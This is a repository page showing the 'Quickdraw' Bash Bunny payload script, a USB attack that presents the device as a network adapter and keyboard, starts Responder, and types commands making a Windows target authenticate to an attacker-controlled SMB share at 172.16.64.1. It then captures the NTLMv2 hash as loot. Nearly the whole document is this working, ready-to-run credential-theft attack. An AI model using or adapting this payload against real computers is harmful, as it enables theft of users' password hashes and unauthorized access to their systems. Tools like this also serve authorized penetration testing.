hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
5e1dbdb4895d192f1b54121ecaea7337bd4882be
bashbunny-payloads/payloads/library/credentials/Quickdraw/payload.txt
Marc 5fc5a3b0b5 Cleanup: Quickdraw: Update payload header.
2019-07-05 07:41:30 +01:00

65 lines
1.1 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: Quickdraw
# Author: golem445
# Version: 1.0
# Attack Modes: HID, RNDIS_ETHERNET
# Dependencies: Responder
# Runtime: ~8 seconds
# Description:
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# runs Responder, then uses HID to generate an NTLMv2 hash
# response from the target computer.
#
# LEDS:
# Magenta: Setup
# Yellow Blink: Attacking
# Green: Attack Finished
# Prereq check
REQUIRETOOL responder
# Begin attack setup
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET TARGET_HOSTNAME
LOOTDIR=/root/udisk/loot/quickdraw
# Prep loot logging
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
cd /tools/responder/
rm logs/*
# Begin Responder
LED ATTACK
python Responder.py -I usb0 -wfvr &
## Start HID Attack
sleep 1
RUN WIN cmd
Q DELAY 250
Q STRING "powershell \\\\172.16.64.1\\s"
Q ENTER
Q STRING "exit"
Q ENTER
# Wait for NTLMv2 capture to complete
LED STAGE2
until [ -f logs/*NTLM* ]
do
sleep 1
done
# copy logs to loot directory
cp logs/* $LOOTDIR/$HOST-$COUNT
# Sync the file system
sync
## Finished
LED FINISH
Reference in New Issue View Git Blame Copy Permalink